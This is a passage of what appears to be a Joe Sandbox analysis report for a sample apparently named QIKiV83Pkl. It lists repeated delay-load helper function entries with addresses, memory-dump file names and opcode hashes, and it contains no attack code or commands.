                • Instruction Fuzzy Hash: 3DB0129126C2017C3108715C6C02D36032CF4C3B10330C52BB709D03C1D8406C0D1632
                Function 0088D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 727f15e219d796b744a94fb8795fea0a9bf8c277fdd2b7c212da93644594aaf7
                • Instruction ID: ab3b3bded0338d9c4d0b6dfbd517e3f36170cd1b0e6de77f659d168e00209818
                • Opcode Fuzzy Hash: 727f15e219d796b744a94fb8795fea0a9bf8c277fdd2b7c212da93644594aaf7
                • Instruction Fuzzy Hash: 2EB0129126C2017C310C715C6D02D36032CF4C2B10330C52BB309D03C1D8406C0E1632
                Function 0088D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ecd1ecf74a78a68804d4db669a1dedc82182cecfee8fd4f71d239f37643ec928
                • Instruction ID: 7cc1fc4056f0ed70fdab3abda9d303c08c0df0458bf8a705fe7fb567cbdbb0eb
                • Opcode Fuzzy Hash: ecd1ecf74a78a68804d4db669a1dedc82182cecfee8fd4f71d239f37643ec928
                • Instruction Fuzzy Hash: 4CB0129126C3017C3148715C6C02D36032CF4C2B10330C62BB309D03C1D8406C8D1632
                Function 0088D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7b21e5deb510886da947fb74da5910dea2f07f9491409e225783e14908ecd72b
                • Instruction ID: 9cb4c5d1a8a50d3d31096cd76cd8b0b0145485bf4ac58bbf7c9537afbf562825
                • Opcode Fuzzy Hash: 7b21e5deb510886da947fb74da5910dea2f07f9491409e225783e14908ecd72b
                • Instruction Fuzzy Hash: 63B012A126C201BC310871586C02D36031CF4C3B10330C52BB70DD02C1D8406C091632
                Function 0088D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4846d36c157e9e2a9799e65e2907ba05b5f343ede6f60a8ee3dce5d53295302c
                • Instruction ID: 75b339be5dfdecb20e39d8bb8391c2721bb31db8281f9abe91da829203a90430
                • Opcode Fuzzy Hash: 4846d36c157e9e2a9799e65e2907ba05b5f343ede6f60a8ee3dce5d53295302c
                • Instruction Fuzzy Hash: 68B012A126C301BC314871586C02D36031CF4C2B10330862BF30DD02C1D8406C491632
                Function 0088D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 68433bc506b514d1121dca80827680341e8814268aa0001fe8d14d58b6151ea6
                • Instruction ID: 663c8094a4cc19648d21aa7fd124a57a6ee2de7c3a843b853a6f482a4aa443ac
                • Opcode Fuzzy Hash: 68433bc506b514d1121dca80827680341e8814268aa0001fe8d14d58b6151ea6
                • Instruction Fuzzy Hash: C6B012A126C202BC310C7159AC02D36031CF4C2B10330852BB30DD02C1D8406C091632
                Function 0088D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3d106dc00be9e371e0a93a76267b2e88e59c20c0e890505e0dff3855ef1e45c3
                • Instruction ID: 9cab3c57fb5b7d61b7cb142c56f708fe1027e7551cddcf4ea0eca6b573d67214
                • Opcode Fuzzy Hash: 3d106dc00be9e371e0a93a76267b2e88e59c20c0e890505e0dff3855ef1e45c3
                • Instruction Fuzzy Hash: 67B012A126C201BC310C71586D02D36031CF4C2B10330852BB30DD02C1D8406D0A1632
                Function 0088E1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088E20B
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c560872c7edf590cef703e8ecd74d25a777b394c4dbb20c8b9edcc87d35c21f3
                • Instruction ID: 034316f2781358b9eebfe81b1eb1ed0e7e08fe60a9da9421b77a82ecb9722ce3
                • Opcode Fuzzy Hash: c560872c7edf590cef703e8ecd74d25a777b394c4dbb20c8b9edcc87d35c21f3
                • Instruction Fuzzy Hash: 9BB012A126E1017C320C3146BD06C3A032CF4C0B51330811FB315D41C19B404C299133
                Function 0088D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 84a4aeee8a1c363e2091fa2ac740f156951b2990d5bf54aabc1082a16412eeb1
                • Instruction ID: ae4ae053c6fef5dd67206048a710bea5157a3ee8f3f24b207303595fa3f015ae
                • Opcode Fuzzy Hash: 84a4aeee8a1c363e2091fa2ac740f156951b2990d5bf54aabc1082a16412eeb1
                • Instruction Fuzzy Hash: 3CB012A126D2017C310871586C02D3A031DF4C3B10330C52BB709D02C1D840AC081632
                Function 0088D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b26af0c5bba138eb69b563f41a8dbb5ccf3fe75665c3ac4a92bcee5cc979c6ce
                • Instruction ID: 2622381fb06459c59cb4cf848ecfe2149508338f405b80e042da805a7445b7cd
                • Opcode Fuzzy Hash: b26af0c5bba138eb69b563f41a8dbb5ccf3fe75665c3ac4a92bcee5cc979c6ce
                • Instruction Fuzzy Hash: 8EB012B126D3017C314872986C02D3A031DF4C2B10330862BB309D02C1D840AC481632
                Function 0088D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: dcec92a98408c1a33efaaea77caabfd0c33fc46eff7850ce5e9f6c4ae6ef6520
                • Instruction ID: 6b75806b4645adb76c962f532bbc8fb2763a5cb33cba1c9c9bc1b63ea76d3eaf
                • Opcode Fuzzy Hash: dcec92a98408c1a33efaaea77caabfd0c33fc46eff7850ce5e9f6c4ae6ef6520
                • Instruction Fuzzy Hash: 44B012912AC2017C310871686C03D36035CF8C3B10330C52BB709D02C1E9406C081632
                Function 0088D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7d2126f2fefd106f653b62ffbd26c543cf358f380465786db5dfeba3af09982e
                • Instruction ID: 158913c71d2be167a64505ed274f3574abdf0bb9870288ad1938038d4c7d163a
                • Opcode Fuzzy Hash: 7d2126f2fefd106f653b62ffbd26c543cf358f380465786db5dfeba3af09982e
                • Instruction Fuzzy Hash: B0B012A127D2027C310871586C02D3A035DF8C2B10330852BB309D02C1D840AC081632
                Function 0088D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 50b5ba59ec471cdaf2f06f16e1a836635b3427dd94ca28e68bb890838fc1d64c
                • Instruction ID: 352571dfc779a5b7b8d56b80a01a4fb7a5bb6b0bc690b039787ba8b0e25b8f3f
                • Opcode Fuzzy Hash: 50b5ba59ec471cdaf2f06f16e1a836635b3427dd94ca28e68bb890838fc1d64c
                • Instruction Fuzzy Hash: 03B012A12AC2017C310C71586D03D36039CF8C3B10330852BB309D02C1E8406C091632
                Function 0088DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5fe760a3cd7293b6b77ee49abbfa991347939b7ccf0b6841f9acd4edc2759f2a
                • Instruction ID: 8256c4b2454b0c94b431f825bfefafe3547228e8ce36e7e6ffbd1a12c1853099
                • Opcode Fuzzy Hash: 5fe760a3cd7293b6b77ee49abbfa991347939b7ccf0b6841f9acd4edc2759f2a
                • Instruction Fuzzy Hash: 89B012A126C201AC320C714A6D02D3A035CF0C0B50330C21BB509C02C5E8484C095632
                Function 0088DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c56a39590e194024fbbf2fc64f8c036db84114ebad626934d68868f64b298c54
                • Instruction ID: fb6d4dd5d6cb830a715e0650d7febfaa2d7b69230a91c41f50fb72bc13fed8ab
                • Opcode Fuzzy Hash: c56a39590e194024fbbf2fc64f8c036db84114ebad626934d68868f64b298c54
                • Instruction Fuzzy Hash: 24B0129126C2016C310C714E6D02E3E035CF0C4B50330C61BB209C02C9E8444C0D5632
                Function 0088DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 74bee080460cde56825c183f89f4c7811e225567bd98c049d257bc0f4130f0b0
                • Instruction ID: 51878abf8f8e9116da075f8076a1a2820c8a43f24e1e0a900ce182479bb72b21
                • Opcode Fuzzy Hash: 74bee080460cde56825c183f89f4c7811e225567bd98c049d257bc0f4130f0b0
                • Instruction Fuzzy Hash: 0AB0129537C30A7C320831442C07C37036CF0C0B30330462BB206D01C19D404C4D5132
